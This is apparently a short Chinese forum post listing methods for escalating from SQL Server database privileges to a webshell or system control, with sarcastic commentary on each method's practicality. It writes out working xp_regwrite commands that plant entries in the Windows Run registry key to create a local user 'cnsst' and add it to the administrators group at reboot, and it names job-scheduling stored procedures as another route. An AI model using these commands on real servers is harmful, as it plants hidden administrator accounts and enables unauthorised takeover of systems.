DB权限目前公开的方法有如下几种(公供参考):
1、众所周知的备份得Webshell(E人注释:Lcx也提及过,备份的东东是个理论化的东东,假如备份出来的东东20来M,还有毛用!?)
2、Lcx的读VNC密码得系统权限(E人注释:假如没有VNC,还搞毛呀,局限性太大,具体去看LCX的文章)
3、利用xp_regwrite再注册表里直接加个系统帐号或者直接写个webshell,在主机重起的时候就可以拿到webshell或者系统权限。(E人注释:利用xp_regwrite来取得系统权限的方法:xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','x
wq1','REG_SZ','net user cnsst cnsst /add'
xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','x
wq2','REG_SZ','net localgroup administrators cnsst /add')
4、利用添加作业的一些存储过程,sp_add_job,sp_addtask之类得到系统权限。
5、万能提权(E人注释:前面已提过了,成功率几乎0)
当前位置:
